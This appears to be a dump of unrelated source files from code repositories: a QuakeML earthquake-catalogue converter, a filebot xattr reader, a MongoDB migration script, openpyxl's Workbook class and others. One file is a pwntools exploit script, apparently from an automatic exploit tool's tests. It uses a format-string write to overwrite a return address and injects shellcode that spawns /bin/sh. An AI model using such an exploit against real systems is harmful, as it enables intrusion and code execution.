    if magscale == 'UNK':
        magscale = 'ML'
    mag = {'magnitude': float(parts[0]),
           'magscale': magscale,
           'magauthor': ' '.join(parts[2:])}
    event.setdefault('magnitude', []).append(mag)
    return event
def readPhaseLine(event,line,st):
    """Parse a phase record into event['phases'].

    Phases are stored in a dict keyed by 'NSCL_phasename' so a later
    duplicate of the same station/phase pair replaces the earlier one (MLOC
    files can list a pick twice; the second instance is the one wanted).

    :param event: Event dict being assembled (mutated in place).
    :param line:  Phase record (usage flag, station, distance, azimuth,
                  phase name, date/time fields, precision, residual, error).
    :param st:    StationTranslator used to map the station code to NSCL.
    :returns: The event dict.  Lines whose station cannot be mapped to an
              NSCL name are echoed to stdout and skipped.
    """
    parts = line[1:].split()
    phase = {}
    phase['id'] = datetime.utcnow() #used later to link picks and arrivals
    try:
        phase['usage'] = USAGE[parts[0]]
    except KeyError:
        pass #unrecognized usage flag -- leave 'usage' unset
    station = parts[1]
    phase['name'] = parts[4]
    phase['distance'] = float(parts[2])
    phase['azimuth'] = int(parts[3])
    year = int(parts[5])
    month = int(parts[6])
    day = int(parts[7])
    hour = int(parts[8])
    minute = int(parts[9])
    second = float(parts[10])
    microsecond = int((second - int(second))*1e6)
    second = int(second) - 1 #assumption here is that input seconds are 1 to 60
    if second == -1: #sometimes seconds are 0 to 59, sometimes 1 to 60. Not my problem.
        second = 0
    phase['time'] = datetime(year,month,day,hour,minute,second,microsecond)
    nscl_station = st.getNSCL(station,phase['name'],phase['time'])
    phase['sta'] = nscl_station
    if nscl_station == station:
        #no NSCL mapping found -- echo the raw line for the operator and skip
        print(line.strip())
        return event
    phase['precision'] = int(parts[11])
    phase['residual'] = float(parts[12])
    phase['error'] = float(parts[13])
    phasekey = phase['sta']+'_'+phase['name']
    event.setdefault('phases', {})[phasekey] = phase.copy()
    return event
def createMagTag(event):
    """Build the QuakeML <magnitude> Tag for the event's preferred magnitude.

    The preferred magnitude is chosen by scale priority Mw > mb > ML > MN > MD.

    :param event: event dict containing a non-empty 'magnitude' list.
    :return: (magnitudetag, magnitude value, publicID string).
    :raises Exception: if no magnitude matches a known scale.
    """
    prefmag = None
    # Scan scales in priority order across *all* magnitudes.  The previous
    # single pass broke on the first magnitude matching any scale, so an Mw
    # appearing later in the list could lose to an ML appearing earlier.
    for scale in ('mw', 'mb', 'ml', 'mn', 'md'):
        for mag in event['magnitude']:
            if mag['magscale'].lower() == scale:
                prefmag = mag.copy()
                if scale == 'mw':
                    # Normalize the capitalization of moment magnitude.
                    prefmag['magscale'] = 'Mw'
                break
        if prefmag is not None:
            break
    if prefmag is None:
        raise Exception("No preferred magnitude scale for event %s" % event['id'])
    magtype = prefmag['magscale']
    magid = 'us_%s_%s' % (event['id'], magtype)
    magsource = prefmag['magauthor']
    # Create the magnitude tag.
    pubid = 'quakeml:us.anss.org/magnitude/%s/%s' % (event['id'], magtype)
    magnitudetag = Tag('magnitude', attributes={'catalog:dataid': magid,
                                                'catalog:datasource': magsource,
                                                'publicID': pubid})
    # Create all the pieces of the magnitude tag.
    magvaluetag = Tag('value', data='%.1f' % prefmag['magnitude'])
    magtag = Tag('mag')
    magtag.addChild(magvaluetag)
    magtypetag = Tag('type', data=magtype)
    magcreationtag = Tag('creationInfo')
    magauthortag = Tag('author', data=prefmag['magauthor'])
    magcreationtag.addChild(magauthortag)
    # Add the pieces to the magnitude tag.
    magnitudetag.addChild(magtag)
    magnitudetag.addChild(magtypetag)
    magnitudetag.addChild(magcreationtag)
    return (magnitudetag, prefmag['magnitude'], pubid)
def createOriginTag(event, studyname):
    """Build the QuakeML <origin> Tag (location, time, quality) for an event.

    :param event: parsed event dict with hypocenter fields and 'phases'.
    :param studyname: short study name appended to SOURCE as the catalog id.
    :return: (origintag, originid publicID string).
    """
    eventcode = event['id']
    catalog = SOURCE + studyname
    originid = 'quakeml:us.anss.org/origin/%s' % ('%s%s' % (catalog, event['id']))
    origintag = Tag('origin', attributes={'catalog:dataid': '%s%s' % (catalog, event['id']),
                                          'catalog:datasource': SOURCE,
                                          'catalog:eventid': '%s' % event['id'],
                                          'catalog:eventsource': catalog,
                                          'publicID': originid})
    # Confidence ellipse (km in the input, meters in QuakeML).
    uncertaintag = Tag('originUncertainty')
    atag = Tag('maxHorizontalUncertainty', data='%.2f' % (event['smajor'] * 1000))
    btag = Tag('minHorizontalUncertainty', data='%.2f' % (event['sminor'] * 1000))
    aztag = Tag('azimuthMaxHorizontalUncertainty', data='%.2f' % (event['azimuth']))
    uncertaintag.addChild(atag)
    uncertaintag.addChild(btag)
    uncertaintag.addChild(aztag)
    # Time.
    timetag = Tag('time')
    tvaluetag = Tag('value', data=event['time'].strftime(TIMEFMT))
    terrortag = Tag('uncertainty', data='%.2f' % (event['timeerror']))
    timetag.addChild(tvaluetag)
    timetag.addChild(terrortag)
    # Latitude.
    lattag = Tag('latitude')
    latvaluetag = Tag('value', data='%.4f' % (event['lat']))
    lattag.addChild(latvaluetag)
    # Longitude.
    lontag = Tag('longitude')
    lonvaluetag = Tag('value', data='%.4f' % (event['lon']))
    lontag.addChild(lonvaluetag)
    # Depth (km in the input, meters in QuakeML).
    depthtag = Tag('depth')
    depthvaluetag = Tag('value', data='%i' % (int(event['depth'] * 1000)))
    depthlowertag = Tag('lowerUncertainty', data='%i' % (int(event['depthlower'] * 1000)))
    depthuppertag = Tag('upperUncertainty', data='%i' % (int(event['depthupper'] * 1000)))
    depthtypetag = Tag('depthType', data=DEPTHTYPES[event['depthcode']])
    depthtag.addChild(depthvaluetag)
    depthtag.addChild(depthlowertag)
    depthtag.addChild(depthuppertag)
    depthtag.addChild(depthtypetag)
    # Quality metrics derived from the phases actually used in the solution.
    stationlist = []
    nphases = 0
    azlist = []
    rmslist = []
    mindist = 999999999999
    # dict.iteritems() was removed in Python 3; only the values are needed.
    for phase in event['phases'].values():
        if not phase['usage']:
            continue
        nphases += 1
        if phase['sta'] not in stationlist:
            stationlist.append(phase['sta'])
        rmslist.append(phase['residual'])
        if phase['distance'] < mindist:
            mindist = phase['distance']
        azlist.append(phase['azimuth'])
    # NOTE(review): assumes at least one used phase; an event with none would
    # raise ZeroDivisionError/IndexError below -- confirm inputs guarantee this.
    azlist = sorted(azlist)
    resmean = sum(rmslist) / len(rmslist)
    sumsquares = sum([math.pow(xi - resmean, 2) for xi in rmslist])
    stderr = math.sqrt(sumsquares / len(rmslist))
    # Azimuthal gap: largest angular gap between consecutive azimuths,
    # including the wrap-around gap between the last and first.
    gap = azlist[0] + 360.0 - azlist[-1]
    for i in range(1, len(azlist)):
        dt = azlist[i] - azlist[i - 1]
        if dt > gap:
            gap = dt
    nstations = len(stationlist)
    qualitytag = Tag('quality')
    phasecounttag = Tag('usedPhaseCount', data='%i' % nphases)
    stationcounttag = Tag('usedStationCount', data='%i' % nstations)
    stderrtag = Tag('standardError', data='%.2f' % stderr)
    gaptag = Tag('azimuthalGap', data='%i' % int(gap))
    disttag = Tag('minimumDistance', data='%.2f' % mindist)
    qualitytag.addChild(phasecounttag)
    qualitytag.addChild(stationcounttag)
    qualitytag.addChild(stderrtag)
    qualitytag.addChild(gaptag)
    qualitytag.addChild(disttag)
    # Evaluation status and mode.
    evaltag = Tag('evaluationStatus', data='reviewed')
    modetag = Tag('evaluationMode', data='manual')
    # Creation info.
    origincreationtag = Tag('creationInfo')
    originauthortag = Tag('author', data=event['author'])
    origincreationtag.addChild(originauthortag)
    # Roll up the origin tag.
    origintag.addChild(uncertaintag)
    origintag.addChild(timetag)
    origintag.addChild(lattag)
    origintag.addChild(lontag)
    origintag.addChild(depthtag)
    origintag.addChild(qualitytag)
    origintag.addChild(evaltag)
    origintag.addChild(modetag)
    origintag.addChild(origincreationtag)
    return (origintag, originid)
def createArrivalTag(phase, eventid):
    """Build the QuakeML <arrival> Tag for one phase of an event.

    The phase's 'id' timestamp is embedded in both the arrival and pick
    publicIDs so the two tags can be linked together.
    """
    stamp = '%s.%s' % (phase['id'].strftime('%s'), phase['id'].strftime('%f'))
    arrivaltag = Tag('arrival', attributes={
        'publicID': 'quakeml:us.anss.org/arrival/%s/us_%s' % (eventid, stamp)})
    children = (
        Tag('pickID', data='quakeml:us.anss.org/pick/%s/us_%s' % (eventid, stamp)),
        Tag('phase', data=phase['name']),
        Tag('azimuth', data='%.2f' % (phase['azimuth'])),
        Tag('distance', data='%.2f' % (phase['distance'])),
        Tag('timeResidual', data='%.2f' % (phase['residual'])),
        Tag('timeWeight', data='%.2f' % (phase['error'])),
    )
    for child in children:
        arrivaltag.addChild(child)
    return arrivaltag
def createPickTag(phase, eventid):
    """Build the QuakeML <pick> Tag for one phase of an event.

    The waveformID attributes are only emitted for NSCL components that are
    non-empty after stripping '-' placeholders.
    """
    stamp = '%s.%s' % (phase['id'].strftime('%s'), phase['id'].strftime('%f'))
    pickid = 'quakeml:us.anss.org/pick/%s/us_%s' % (eventid, stamp)
    picktag = Tag('pick', attributes={'publicID': pickid})
    timetag = Tag('time')
    timetag.addChild(Tag('value', data=phase['time'].strftime(TIMEFMT + 'Z')))
    network, station, channel, location = phase['sta'].split('.')
    attributes = {}
    for key, code in (('networkCode', network),
                      ('stationCode', station),
                      ('channelCode', channel),
                      ('locationCode', location)):
        if code.replace('-', '').strip() != '':
            attributes[key] = code
    wavetag = Tag('waveformID', attributes=attributes)
    # phaseHint duplicates arrival->phase (??)
    hinttag = Tag('phaseHint', data=phase['name'])
    evaltag = Tag('evaluationMode', data='manual')
    for child in (timetag, wavetag, hinttag, evaltag):
        picktag.addChild(child)
    return picktag
def createEventTag(event, studyname):
    """Build the full QuakeML document Tag tree for one event.

    :param event: parsed event dict (must contain 'phases'; 'magnitude'
                  is optional).
    :param studyname: short study name appended to SOURCE as the catalog id.
    :return: (quaketag, prefmag) where prefmag is the preferred magnitude
             value, or None when the event has no magnitude.
    """
    quaketag = Tag('q:quakeml', attributes={'xmlns:q': 'http://quakeml.org/xmlns/quakeml/1.2',
                                            'xmlns': 'http://quakeml.org/xmlns/bed/1.2',
                                            'xmlns:catalog': 'http://anss.org/xmlns/catalog/0.1',
                                            'xmlns:tensor': 'http://anss.org/xmlns/tensor/0.1'})
    pubid = 'quakeml:us.anss.org/eventparameters/%s/%i' % (event['id'], int(datetime.utcnow().strftime('%s')))
    creationinfotag = Tag('creationInfo')
    agencyidtag = Tag('agencyID', data='us')
    creationtimetag = Tag('creationTime', data=datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S') + 'Z')
    creationinfotag.addChild(agencyidtag)
    creationinfotag.addChild(creationtimetag)
    paramtag = Tag('eventParameters', attributes={'xmlns': 'http://quakeml.org/xmlns/bed/1.2',
                                                  'publicID': pubid})
    paramtag.addChild(creationinfotag)
    catalog = SOURCE + studyname
    eventtag = Tag('event', attributes={'catalog:dataid': '%s%s' % (catalog, event['id']),
                                        'catalog:datasource': SOURCE,
                                        'catalog:eventid': '%s' % event['id'],
                                        'catalog:eventsource': catalog})
    # Initialize so the return below cannot hit an unbound name when the
    # event has no magnitude (previously this raised NameError).
    magtag = None
    prefmag = None
    # dict.has_key() was removed in Python 3; 'in' works in both 2 and 3.
    if 'magnitude' in event:
        magtag, prefmag, pubmagid = createMagTag(event)
        hypotag, originid = createOriginTag(event, studyname)
        preferredtag = Tag('preferredOriginID', data=originid)
        prefmagtag = Tag('preferredMagnitudeID', data=pubmagid)
        eventtag.addChild(preferredtag)
        eventtag.addChild(prefmagtag)
    # dict.iteritems() was removed in Python 3; only the values are needed.
    for phase in event['phases'].values():
        arrivaltag = createArrivalTag(phase, event['id'])
        picktag = createPickTag(phase, event['id'])
        eventtag.addChild(picktag)
        hypotag.addChild(arrivaltag)
    # Roll up eventtag.
    if magtag is not None:
        eventtag.addChild(magtag)
    eventtag.addChild(hypotag)
    # Roll up eventParameters tag.
    paramtag.addChild(eventtag)
    # Roll up quakeml tag.
    quaketag.addChild(paramtag)
    return (quaketag, prefmag)
def main(args):
    """Read an RDE relocation cluster file and write one QuakeML file per event.

    Side effects: creates args.outfolder if needed, writes one .xml file per
    event there, and saves the station-code dictionary to stationcodes.dat.

    :param args: argparse namespace with qomfile, outfolder, studyname,
                 pubid and dictionary attributes.
    """
    qomfile = args.qomfile
    outfolder = args.outfolder
    if not os.path.isdir(outfolder):
        os.makedirs(outfolder)
    st = StationTranslator(dictionaryfile=args.dictionary)
    f = open(qomfile, 'rt')
    events = []
    event = {}
    i = 1
    comment = ''
    nphases = 0
    phaselist = []
    # Iterate the file lazily instead of slurping it with readlines().
    for line in f:
        if line.startswith('L'):
            event = readLayerLine(event, line)
        if line.startswith('C'):
            event = readStationLine(event, line)
        if line.startswith('#'):
            comment += line.strip('#')
        if line.startswith('E'):
            # Ignore the file's own event ID fields; number events ourselves.
            event['id'] = '%08i' % i
        if line.startswith('H'):
            event = readHypoLine(event, line)
        if line.startswith('M'):
            event = readMagnitudeLine(event, line)
        if line.startswith('P'):
            nphases += 1
            event = readPhaseLine(event, line, st)
        if line.startswith('STOP'):
            # 'STOP' terminates one event record.
            events.append(event.copy())
            sys.stderr.write('Parsed event %i\n' % i)
            i += 1
            sys.stderr.flush()
            event = {}
    f.close()
    print('Read %i events' % len(events))
    # Try to find the best magnitude from ComCat for the larger events.
    for event in events:
        if event['magnitude'][0]['magnitude'] > MINMAG:
            prefmag = getPrefMag(event)
            if prefmag is not None:
                print('For event %s, switching magnitude M%.1f to M%.1f' %
                      (event['time'], event['magnitude'][0]['magnitude'], prefmag))
                event['magnitude'][0]['magnitude'] = prefmag
    dictfile = 'stationcodes.dat'
    print('Saving dictionary of station codes to %s' % dictfile)
    st.save(dictfile)
    # Track the catalog's overall time/space/magnitude extent while writing
    # the per-event QuakeML files.
    tmin = datetime(2500, 1, 1)
    tmax = datetime(1900, 1, 1)
    latmin = 95.0
    latmax = -95.0
    lonmin = 190000.0
    lonmax = -190000.0
    magmin = 10.1
    magmax = -0.1
    for event in events:
        etag, prefmag = createEventTag(event, args.studyname)
        if event['time'] < tmin:
            tmin = event['time']
        if event['time'] > tmax:
            tmax = event['time']
        if event['lat'] < latmin:
            latmin = event['lat']
        if event['lat'] > latmax:
            latmax = event['lat']
        if event['lon'] < lonmin:
            lonmin = event['lon']
        if event['lon'] > lonmax:
            lonmax = event['lon']
        if prefmag < magmin:
            magmin = prefmag
        if prefmag > magmax:
            magmax = prefmag
        fname = os.path.join(outfolder, SOURCE + event['id'] + '.xml')
        # Render the tag tree and strip pretty-printing whitespace.
        xmlstr = etag.renderTag(0)
        xmlstr = xmlstr.replace('\t', '')
        xmlstr = xmlstr.replace('\n', '')
        f = open(fname, 'wt')
        f.write(xmlstr)
        f.close()
    if args.pubid:
        # NOTE(review): currently unused after this assignment.
        pubid = args.pubid
    # print
    # print 'Catalog Name: %s' % args.studyname
    # print 'Catalog Authors: %s' % ', '.join(args.authors.split(','))
    # print 'Point of Contact: %s, %s' % (args.contactname,args.contactemail)
    # print 'Short Description: %s' % (args.description)
    # print 'Time Span: %s to %s' % (tmin.strftime(TIMEFMT),tmax.strftime(TIMEFMT))
    # print 'Spatial Domain: Latitude %.4f to %.4f, Longitude %.4f to %.4f' % (latmin,latmax,lonmin,lonmax)
    # print 'Magnitude Range: %.1f to %.1f' % (magmin,magmax)
    # print 'Detailed Description:\n%s' % textwrap.fill(comment,80)
if __name__ == '__main__':
    # Command-line interface: three positional arguments plus two optional
    # flags; parsed namespace is handed straight to main().
    desc = "Create QuakeML files and metadata output for an input RDE relocation cluster file"
    parser = argparse.ArgumentParser(description=desc,formatter_class=argparse.RawDescriptionHelpFormatter)
    #positional arguments
    parser.add_argument('qomfile',
                        help='Input study data file')
    parser.add_argument('outfolder',
                        help='Output folder where QuakeML files will be written')
    parser.add_argument('studyname',
                        help='Short name of study (mineral2011) - will be prepended with rde and used as ComCat catalog name.')
    # parser.add_argument('authors',
    #                     help='Comma separated list of authors (surround with quotes).')
    # parser.add_argument('description',
    #                     help='One-line description of study.')
    # parser.add_argument('contactemail',
    #                     help='Email of main point of contact.')
    # parser.add_argument('contactname',
    #                     help='Name of main point of contact.')
    parser.add_argument('-p','--pubid', dest='pubid',
                        help='(Optional) doi number.')
    parser.add_argument('-d','--dictionary', dest='dictionary',
                        help='(Optional) File containing dictionary of station->NSCL codes.')
    pargs = parser.parse_args()
    main(pargs)
| [
"mhearne@usgs.gov"
] | mhearne@usgs.gov |
eae8abe134495da20b517f2e9472c36992a1ea5d | 91ff566b975b7c0a21d280aa192953622600afae | /deploy_flask/lib/python3.6/ntpath.py | 1e45631713ffa8a4537cc00e40f64056c55af8f6 | [] | no_license | mattg317/Deploying_with_Flask | 93e1f19f093e02b886f02e01c30075fbbbafb6e1 | 881e694f74bd2f170ed8f638ffb97811d19e3969 | refs/heads/master | 2021-09-04T12:50:36.147008 | 2018-01-18T21:41:18 | 2018-01-18T21:41:18 | 107,602,674 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /Users/matthewgiordanella/anaconda/lib/python3.6/ntpath.py | [
"mattg317@gmail.com"
] | mattg317@gmail.com |
5cb5b444d884d749465d4e777e33c10b94b3b810 | 10857edc2c10a89077555595b253376dbdcd17cb | /main.py | a6684596c2dc869d436e1a05c48af4f0243a50d3 | [
"MIT"
] | permissive | pannal/libfilebot | dfe0a55e804b9118fc643057ac010432c903ac10 | 996736ec0139aeae95f44e7fdb0a748fe08214c5 | refs/heads/master | 2021-09-02T01:27:48.203475 | 2017-12-29T16:58:30 | 2017-12-29T16:58:30 | 115,065,680 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,648 | py | # coding=utf-8
import subprocess
import sys
import traceback
import logging
import re
import binascii
import types
from pipes import quote
from lib import find_executable
if sys.platform == "win32":
from pyads import ADS
logger = logging.getLogger(__name__)
def quote_args(seq):
    """Return *seq* joined into a single shell-safe command string."""
    return ' '.join(map(quote, seq))
def win32_xattr(fn):
handler = ADS(fn)
return handler.get_stream_content("net.filebot.filename")
def default_xattr(fn):
    """Return the command line used to read the filebot xattr via an external tool.

    Dispatches on whichever of getfattr/attr/filebot was detected at import
    time (module-level ``default_xattr_bin``).
    """
    if not default_xattr_bin:
        raise Exception("Neither getfattr, attr nor filebot were found")
    if "getfattr" in default_xattr_bin:
        return ["getfattr", "-n", "user.net.filebot.filename", fn]
    if "attr" in default_xattr_bin:
        return ["attr", "-g", "net.filebot.filename", fn]
    return ["filebot", "-script", "fn:xattr", fn]
# Per-platform (args builder, result parser) pairs.
# NOTE: the "darwin" and "win32" entries previously used {...}, which builds
# a *set* of the two lambdas, so unpacking them into (args_func, match_func)
# in get_filebot_attrs had arbitrary, hash-dependent order.  They must be
# tuples like the "default" entry.
XATTR_MAP = {
    "default": (
        default_xattr,
        lambda result: re.search('(?um)(net\.filebot\.filename(?=="|: )[=:" ]+|Attribute.+:\s)([^"\n\r\0]+)',
                                 result).group(2)
    ),
    "darwin": (
        # macOS: xattr prints hex pairs; decode and strip trailing NULs.
        lambda fn: ["xattr", "-p", "net.filebot.filename", fn],
        lambda result: binascii.unhexlify(result.replace(' ', '').replace('\n', '')).strip("\x00")
    ),
    "win32": (
        # Windows: no subprocess; the filename is passed straight to the
        # ADS reader.
        lambda fn: fn,
        win32_xattr,
    ),
}
# Platforms without a native handler fall back to an external tool; pick the
# first of getfattr/attr/filebot found on PATH (None if none are installed,
# which default_xattr() reports at call time).
if sys.platform not in XATTR_MAP:
    default_xattr_bin = find_executable("getfattr") or find_executable("attr") or find_executable("filebot")
def get_filebot_attrs(fn):
    """
    Currently only supports the filebot filename attrs

    :param fn: filename
    :return: the original filename stored by filebot, or None if it could
             not be read
    """
    if sys.platform in XATTR_MAP:
        logger.debug("Using native xattr calls for %s", sys.platform)
    else:
        logger.debug("Using %s for %s", default_xattr_bin, sys.platform)
    args_func, match_func = XATTR_MAP.get(sys.platform, XATTR_MAP["default"])

    args = args_func(fn)

    # A list means "run this command"; anything else is already the raw
    # input for the platform's match function (see the win32 entry).
    # types.ListType was Python-2-only; isinstance(..., list) works in both.
    if isinstance(args, list):
        try:
            output = subprocess.check_output(quote_args(args), stderr=subprocess.PIPE, shell=True)
        # "except E, e" was Python-2-only *syntax* (a SyntaxError on py3);
        # "as e" parses on 2.6+ and 3.
        except subprocess.CalledProcessError as e:
            if e.returncode == 1:
                logger.info(u"%s: Couldn't get filebot original filename", fn)
            else:
                logger.error(u"%s: Unexpected error while getting filebot original filename: %s", fn,
                             traceback.format_exc())
            return
    else:
        output = args

    try:
        orig_fn = match_func(output)
        return orig_fn.strip()
    except Exception:
        logger.info(u"%s: Couldn't get filebot original filename" % fn)
if __name__ == "__main__":
print get_filebot_attrs(sys.argv[1])
| [
"panni@fragstore.net"
] | panni@fragstore.net |
025002537b75adc263d8ca8ed6e3eb0b03adc44b | 077a17b286bdd6c427c325f196eb6e16b30c257e | /08_FmtString-unit-tests/13_32/remenissions-work/exploit-FsRetShellcode.py | e5a56cd137bb5b1dc25714972fc3c717b69d43f1 | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,084 | py | from pwn import *
import os
import sf
import sys
import signal
target = process("./chall-test_FmtString-13-x86")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=32)
target.recvuntil("Tell me I was never good enough: ")
leak = int(target.recvline().strip(b"\n"), 16)
ret_address = leak + (108)
fs = sf.WriteFmtStr(
arch = 32,
value = -0x46,
address = 0x0,
offset = 0x4,
printed_bytes = 0x0,
alignment_bytes = 0x0,
value_base = ret_address,
address_base = ret_address)
payload = sf.BufferOverflow(arch=32, start=108)
payload.add_bytes(108, fs.generate_fmt_str())
payload.add_bytes(70, b"\x83\xec\x7f\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\x04\x05\x04\x06\xcd\x80\xb0\x01\x31\xdb\xcd\x80")
target.sendline(payload.generate_payload())
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
target.recvall(timeout=2)
except Exception:
print("Exploit timed out")
| [
"ryancmeinke@gmail.com"
] | ryancmeinke@gmail.com |
072c86d1641e5db25afaccbb5f221e35910e72be | ea1703dbfedb3abced6dad5acf6f43b341e881ab | /Chapter 1/stringTripleQuotes.py | 51aa135c8109918af8dc6397df8ef1d6f2778a54 | [] | no_license | NathanZuidema/Learn-Python-for-Stats-and-Econ | 2019927cf536411a73049404a8cc15bc12ee7633 | cb589999f1275754e58994ef84c85ccc702707b5 | refs/heads/master | 2020-04-18T08:43:07.756614 | 2019-01-24T16:50:22 | 2019-01-24T16:50:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | #stringTripleQuotes.py
x = """ Everything in this object will be recorded exactly as entered,
if we enter a new line or
a new line with a tab."""
print(x) | [
"jlcatonjr@gmail.com"
] | jlcatonjr@gmail.com |
9e36b3b15685c1ec32b9a2db9b529d46cf6d65ca | b333dc607a2f1556f6a8adb6d16dc88fa8a30c8b | /portal/libs/scripts/one_time/20200814_migrate_visitorsmdb.py | 028a68923f56bb5d6dba9357067bc1e62e676452 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hernan0216/utopia-cms | 6558f8f600620c042dd79c7d2edf18fb77caebb8 | 48b48ef9acf8e3d0eb7d52601a122a01da82075c | refs/heads/main | 2023-02-06T10:31:35.525180 | 2020-12-15T17:43:28 | 2020-12-15T17:43:28 | 321,775,279 | 1 | 0 | BSD-3-Clause | 2020-12-15T19:59:17 | 2020-12-15T19:59:16 | null | UTF-8 | Python | false | false | 2,070 | py | # -*- coding: utf-8 -*-
# la diaria 2020. Aníbal Pacheco.
"""
1. set SIGNUPWALL_MONGODB_VISITOR to None in local_settings before running this script in a "live" environment.
2. touch uwsgi.ini.
3. run this script.
4. drop old table:
mongo
> use ldsocial_signupwall_visitor
> db.dropDatabase()
5. rename new table with the old table name and add indexes:
mongodump --archive="visitor_new" --db=ldsocial_signupwall_visitor_new
mongorestore --archive="visitor_new" --nsFrom='ldsocial_signupwall_visitor_new.*' --nsTo='ldsocial_signupwall_visitor.*'
mongo
> use ldsocial_signupwall_visitor_new
> db.dropDatabase()
> use ldsocial_signupwall_visitor
> db.posts.createIndex({'timestamp': -1})
> db.posts.createIndex({'session_key': -1})
> db.posts.createIndex({'ip_address': -1})
> db.posts.createIndex({'user': -1})
6. return the local setting to its original value.
7. deploy branch with the modifications to use the new table.
"""
from pymongo import MongoClient
from pymongo.errors import ServerSelectionTimeoutError
from progress.bar import Bar
try:
    # Fail fast (1 s) if mongod isn't reachable; server_info() forces a
    # round-trip because MongoClient connects lazily.
    client = MongoClient(serverSelectionTimeoutMS=1000)
    client.server_info()
    signupwall_visitor_mdb = client['ldsocial_signupwall_visitor']
    signupwall_visitor_mdb_new = client['ldsocial_signupwall_visitor_new']
except ServerSelectionTimeoutError:
    # No server: leave both handles unset so the migration below is skipped.
    signupwall_visitor_mdb = signupwall_visitor_mdb_new = None

if signupwall_visitor_mdb and signupwall_visitor_mdb_new:
    # no_cursor_timeout: the migration can outlive the default server-side
    # cursor timeout on large collections.
    visitors = signupwall_visitor_mdb.posts.find({'paths_visited': {'$exists': True}}, no_cursor_timeout=True)
    bar = Bar('Processing ...', max=visitors.count())
    for v in visitors:
        paths_visited = v.get('paths_visited')
        if paths_visited:
            # Denormalize: one new document per visited path instead of one
            # document holding the whole list.
            migrated = {'timestamp': v['last_update'], 'session_key': v['session_key'], 'ip_address': v['ip_address']}
            user = v.get('user')
            if user:
                migrated.update({'user': user})
            signupwall_visitor_mdb_new.posts.insert_many([dict(migrated, path_visited=p) for p in paths_visited])
        bar.next()
    bar.finish()
| [
"apacheco@ladiaria.com.uy"
] | apacheco@ladiaria.com.uy |
003d78fb2133693c22ca4a3d4ce5f95238c5d1a2 | 42b9bafc3c757543328d93fb60269ad4255aae17 | /env/lib/python3.7/site-packages/openpyxl/workbook/workbook.py | 7e5fc075a6deb1c6daf4828bc21ad37c35c01160 | [
"MIT"
] | permissive | mejeng/kasir | 4fe66d1828e72b64d770426d71185cdd3c54127e | cc6f9158b61c0cb45078ddf798af9588c8771311 | refs/heads/master | 2020-09-25T03:36:10.144439 | 2019-11-30T07:59:23 | 2019-11-30T07:59:23 | 225,908,795 | 2 | 0 | MIT | 2019-12-04T16:21:15 | 2019-12-04T16:21:15 | null | UTF-8 | Python | false | false | 13,206 | py | from __future__ import absolute_import
# Copyright (c) 2010-2019 openpyxl
"""Workbook is the top-level container for all document information."""
from copy import copy
from openpyxl.compat import deprecated, long
from openpyxl.worksheet.worksheet import Worksheet
from openpyxl.worksheet._read_only import ReadOnlyWorksheet
from openpyxl.worksheet._write_only import WriteOnlyWorksheet
from openpyxl.worksheet.copier import WorksheetCopy
from openpyxl.utils import quote_sheetname
from openpyxl.utils.indexed_list import IndexedList
from openpyxl.utils.datetime import CALENDAR_WINDOWS_1900
from openpyxl.utils.exceptions import ReadOnlyWorkbookException
from openpyxl.writer.excel import save_workbook
from openpyxl.styles.cell_style import StyleArray
from openpyxl.styles.named_styles import NamedStyle
from openpyxl.styles.differential import DifferentialStyleList
from openpyxl.styles.alignment import Alignment
from openpyxl.styles.borders import DEFAULT_BORDER
from openpyxl.styles.fills import DEFAULT_EMPTY_FILL, DEFAULT_GRAY_FILL
from openpyxl.styles.fonts import DEFAULT_FONT
from openpyxl.styles.protection import Protection
from openpyxl.styles.colors import COLOR_INDEX
from openpyxl.styles.named_styles import NamedStyleList
from openpyxl.styles.table import TableStyleList
from openpyxl.chartsheet import Chartsheet
from .defined_name import DefinedName, DefinedNameList
from openpyxl.packaging.core import DocumentProperties
from openpyxl.packaging.relationship import RelationshipList
from .child import _WorkbookChild
from .protection import DocumentSecurity
from .properties import CalcProperties
from .views import BookView
from openpyxl.xml.constants import (
XLSM,
XLSX,
XLTM,
XLTX
)
# `long` is supplied by openpyxl.compat as a py2/py3 shim.
INTEGER_TYPES = (int, long)


class Workbook(object):
    """Workbook is the container for all other parts of the document."""

    _read_only = False
    _data_only = False
    template = False
    path = "/xl/workbook.xml"

    def __init__(self,
                 write_only=False,
                 iso_dates=False,
                 ):
        self._sheets = []
        self._pivots = []
        self._active_sheet_index = 0
        self.defined_names = DefinedNameList()
        self._external_links = []
        self.properties = DocumentProperties()
        self.security = DocumentSecurity()
        self.__write_only = write_only
        self.shared_strings = IndexedList()

        self._setup_styles()

        self.loaded_theme = None
        self.vba_archive = None
        self.is_template = False
        self.code_name = None
        self.epoch = CALENDAR_WINDOWS_1900
        self.encoding = "utf-8"
        self.iso_dates = iso_dates

        # Write-only workbooks start empty; otherwise create a default sheet.
        if not self.write_only:
            self._sheets.append(Worksheet(self))

        self.rels = RelationshipList()
        self.calculation = CalcProperties()
        self.views = [BookView()]

    def _setup_styles(self):
        """Bootstrap styles"""
        self._fonts = IndexedList()
        self._fonts.add(DEFAULT_FONT)

        self._alignments = IndexedList([Alignment()])

        self._borders = IndexedList()
        self._borders.add(DEFAULT_BORDER)

        self._fills = IndexedList()
        self._fills.add(DEFAULT_EMPTY_FILL)
        self._fills.add(DEFAULT_GRAY_FILL)

        self._number_formats = IndexedList()
        self._date_formats = {}

        self._protections = IndexedList([Protection()])

        self._colors = COLOR_INDEX
        self._cell_styles = IndexedList([StyleArray()])
        self._named_styles = NamedStyleList()
        # Register the built-in "Normal" style so index 0 always exists.
